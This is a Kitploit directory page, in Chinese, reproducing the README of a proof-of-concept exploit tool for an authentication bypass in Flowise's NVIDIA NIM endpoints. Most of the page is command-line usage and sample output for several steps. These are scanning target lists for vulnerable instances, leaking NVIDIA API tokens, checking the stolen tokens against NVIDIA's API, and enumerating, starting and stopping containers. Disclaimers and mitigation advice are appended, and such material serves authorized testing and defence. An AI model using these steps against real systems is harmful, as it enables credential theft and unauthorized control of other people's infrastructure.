Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-30824-Flowise-NVIDIA-NIM-Authentication — 针对 **CVE-2026-30824** 的概念验证漏洞利用程序,这是 Flowise 中一个严重的身份验证绕过漏洞,可在无需身份验证的情况下暴露 NVIDIA NIM API 端点。 | Kitploit
工具/GitHubGitHub/dylvie/cve-2026-30824-flowise-nvidia-nim-authentication
侦察漏洞扫描器漏洞利用Web应用程序漏洞利用API安全测试渗透测试
GitHubdylvie/cve-2026-30824-flowise-nvidia-nim-authentication

CVE-2026-30824-Flowise-NVIDIA-NIM-Authentication

针对 **CVE-2026-30824** 的概念验证漏洞利用程序,这是 Flowise 中一个严重的身份验证绕过漏洞,可在无需身份验证的情况下暴露 NVIDIA NIM API 端点。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
3个月前尚未审核

CVE-2026-30824 — Flowise NVIDIA NIM 认证绕过检测器与利用工具

一个针对 CVE-2026-30824 的概念验证检测器与利用工具,该漏洞是 Flowise 中的一个严重认证绕过漏洞,可在无需认证的情况下暴露 NVIDIA NIM API 端点。

漏洞概述

CVE-2026-30824 是 Flowise(< 3.0.13)中的一个严重认证绕过漏洞,允许未认证的远程攻击者访问 NVIDIA NIM 容器管理和 API 令牌生成端点。

字段值
CVSS 评分9.8(严重)
CWECWE-306:关键功能缺少认证
受影响版本Flowise < 3.0.13
影响完全容器管理、GPU 访问、令牌窃取

根本原因

/api/v1/nvidia-nim/* 路径在全局认证中间件中被列入白名单,允许未认证访问:

  • 令牌生成与泄露
  • 容器管理(列出、启动、停止)
  • Docker 镜像拉取
  • NVIDIA API 集成

功能特性

✅ 漏洞检测 — 快速检查目标是否存在漏洞
✅ 令牌提取 — 从易受攻击的端点泄露 NVIDIA API 令牌
✅ 令牌验证 — 针对 NVIDIA API 验证令牌(展示影响范围)
✅ 容器枚举 — 列出正在运行的 NIM 容器
✅ 批量扫描 — 从文件扫描多个目标
✅ SSL 绕过 — 默认忽略自签名证书
✅ 彩色输出 — 易于阅读的状态指示器(绿色/黄色/红色)
✅ 侦察 — 完整端点映射与诊断


安装

前提条件

  • Python 3.7+
  • requests 库

设置

root@kitploit:~
# 克隆或下载脚本
git clone <repository>
cd cve-2026-30824

# 安装依赖
pip install -r requirements.txt
# 或
pip install requests

使用方法

基本漏洞检查

root@kitploit:~
# 检查单个目标是否存在漏洞
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --check

# 预期输出(存在漏洞):
# [+] 目标疑似存在漏洞(HTTP 200)
#     响应:{...}

扫描多个目标

root@kitploit:~
# 创建 targets.txt,每行一个 URL
cat > targets.txt << EOF
http://192.168.1.100:3000
http://192.168.1.101:3000
http://192.168.1.102:3000
EOF

# 扫描所有目标(快速模式,无提示)
python3 CVE-2026-30824.py -f targets.txt --scan-only

# 预期摘要输出:
# ============================================================
# [*] 扫描摘要
# ============================================================
# [+] 存在漏洞:2
#     ✓ http://192.168.1.100:3000
#     ✓ http://192.168.1.101:3000
# [-] 已修补:1
#     ✗ http://192.168.1.102:3000

提取 NVIDIA API 令牌

root@kitploit:~
# 从易受攻击的端点泄露 NVIDIA API 令牌
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --get-token

# 预期输出:
# [*] 正在尝试泄露 NVIDIA API 令牌...
# [+] NVIDIA API 令牌:eyJ0eXAiOiJKV1QiLCJhbGc...
# [+] 令牌类型:Bearer
# [+] 过期时间:3600 秒

针对 NVIDIA API 验证令牌

root@kitploit:~
# 验证泄露的令牌是否可用于真实的 NVIDIA API
python3 CVE-2026-30824.py --validate-token "eyJ0eXAiOiJKV1QiLCJhbGc..."

# 预期输出:
# [*] 正在针对 NVIDIA API 验证令牌...
# [+] 令牌有效!可访问 45 个 NVIDIA NIM 模型。
#     - mistralai/mistral-7b-instruct-v0.1
#     - meta-llama/llama2-70b
#     - (...)

列出正在运行的容器

root@kitploit:~
# 枚举目标上的容器
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --list-containers

# 预期输出:
# [*] 正在列出正在运行的容器...
# [+] HTTP 200
# [
#   {
#     "id": "abc123xyz",
#     "names": ["flowise_nim"],
#     "image": "nvcr.io/nvidia/nim:latest",
#     "state": "running"
#   }
# ]

完整侦察(所有检查)

root@kitploit:~
# 对易受攻击的目标运行所有侦察检查
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --all

命令行选项

root@kitploit:~
usage: CVE-2026-30824.py [-h] [-t TARGET] [-f TARGETS_FILE] [--check]
                             [--scan-only] [--get-token]
                             [--validate-token TOKEN] [--list-containers]
                             [--get-container CONTAINER_ID]
                             [--get-image IMAGE_ID] [--pull-image IMAGE_TAG]
                             [--start-container IMAGE_TAG]
                             [--container-name CONTAINER_NAME]
                             [--stop-container CONTAINER_ID] [--preload]
                             [--all] [--timeout TIMEOUT] [--debug]

可选参数:
  -h, --help                    显示此帮助信息并退出
  -t, --target TARGET           目标 URL(例如:http://192.168.1.100:3000)
  -f, --targets-file FILE       包含目标列表的文件(每行一个)
  
漏洞检测:
  --check                       仅检查目标是否存在漏洞
  --scan-only                   扫描目标是否存在漏洞,无提示
  --debug                       显示请求详情和原始响应
  
利用:
  --get-token                   泄露 NVIDIA API 令牌
  --validate-token TOKEN        针对 NVIDIA API 验证泄露的令牌
  --list-containers             列出正在运行的 NIM 容器
  --get-container CONTAINER_ID  获取容器详情
  --get-image IMAGE_ID          获取镜像详情
  --pull-image IMAGE_TAG        拉取 Docker 镜像(例如:nvcr.io/nvidia/nim:latest)
  --start-container IMAGE_TAG   从镜像标签启动容器
  --container-name NAME         启动的容器名称
  --stop-container CONTAINER_ID 停止正在运行的容器
  --preload                     触发资源预加载端点
  --all                         运行所有侦察检查
  
高级:
  --timeout SECONDS             请求超时时间(秒)(默认:15)

工作流示例

场景 1:内部网络评估

root@kitploit:~
# 1. 扫描整个子网以查找易受攻击的实例
python3 CVE-2026-30824.py -f internal_ips.txt --scan-only

# 2. 对每个易受攻击的目标提取令牌
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --get-token

# 3. 验证令牌影响
python3 CVE-2026-30824.py --validate-token "<extracted-token>"

场景 2:影响证明

root@kitploit:~
# 验证漏洞并展示完整影响范围
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --all

# 这将:
# 1. 检查漏洞
# 2. 提取 NVIDIA API 令牌
# 3. 针对 NVIDIA API 验证令牌
# 4. 列出正在运行的容器
# 5. 显示资源枚举

场景 3:持续监控

root@kitploit:~
# 定期监控目标(通过 cron 或调度器)
python3 CVE-2026-30824.py -f monitored_targets.txt --scan-only > scan_$(date +%s).log

输出指示器

颜色

  • 🟢 绿色 — 目标存在漏洞或利用成功
  • 🟡 黄色 — 已修补/不存在漏洞或警告
  • 🔴 红色 — 错误或连接失败

状态码

HTTP含义
200✅ 存在漏洞(端点可访问)
400✅ 存在漏洞(应用程序错误但端点存在)
401🟡 已修补(需要认证)
404🟡 非 Flowise 或端点不存在

故障排除

“收到 HTML 响应而非 JSON”

问题: 端点返回 HTML 页面而非 JSON API 响应。

解决方案:

  1. 确认 Flowise 版本确实存在漏洞(< 3.0.13)
  2. 检查目标是否确实运行 Flowise(而非其他应用程序)
  3. 确认该版本的端点路径未更改
  4. 检查反向代理或 WAF 是否干扰

“连接被拒绝”或“超时”

问题: 无法访问目标。

解决方案:

root@kitploit:~
# 测试连接
curl -v http://192.168.1.100:3000/

# 增加超时时间
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --check --timeout 30

SSL 证书错误

问题: 目标使用自签名或过期证书。

解决方案: 脚本默认禁用 SSL 验证。如果问题仍然存在:

root@kitploit:~
# 显式添加端口和协议
python3 CVE-2026-30824.py -t https://192.168.1.100:3000 --check

令牌验证失败

问题: 令牌已提取但针对 NVIDIA API 的验证失败。

原因:

  • 令牌可能已过期
  • 令牌可能无效(端点返回虚假令牌)
  • 与 NVIDIA API 的网络连接被阻止

安全注意事项

⚠️ 法律声明

  • 此工具仅用于授权的安全测试
  • 未经授权访问计算机系统属于违法行为
  • 仅测试您拥有或获得明确许可的系统
  • 作者对滥用行为不承担任何责任

负责任披露

如果您在真实环境中发现此漏洞:

  1. 记录发现结果
  2. 联系组织的安全团队
  3. 给予合理的修复时间(通常为 90 天)
  4. 在修补完成前不要公开披露

缓解措施

针对系统管理员

立即执行:

  1. 将 Flowise 升级至 3.0.13 或更高版本
  2. 实施网络访问控制(防火墙规则)
  3. 如不需要,禁用 NVIDIA NIM 集成
  4. 监控 API 日志以发现可疑的令牌使用

长期措施:

  1. 使用 WAF 规则阻止 /api/v1/nvidia-nim/* 路径
  2. 实施 API 速率限制
  3. 启用安全监控和告警
  4. 定期进行安全评估

针对开发人员

  • 审查代码库中的所有认证绕过
  • 实施默认拒绝访问策略
  • 添加全面的 API 端点安全测试
  • 在 CI/CD 中使用自动化安全扫描

参考资料

  • NVD 条目
  • Flowise GitHub
  • NVIDIA NIM 文档
  • CWE-306:缺少认证

许可证

此工具仅用于教育和授权安全测试目的。详情请参阅 LICENSE 文件。

免责声明

此利用工具按“原样”提供,不附带任何担保。仅可在您拥有或获得明确书面许可的系统上使用。作者不对因使用此工具造成的任何滥用或损害负责。


作者

为授权渗透测试和安全研究而创建。

最后更新: 2026 年 4 月

下载工具
5xx
🔴 服务器错误/配置错误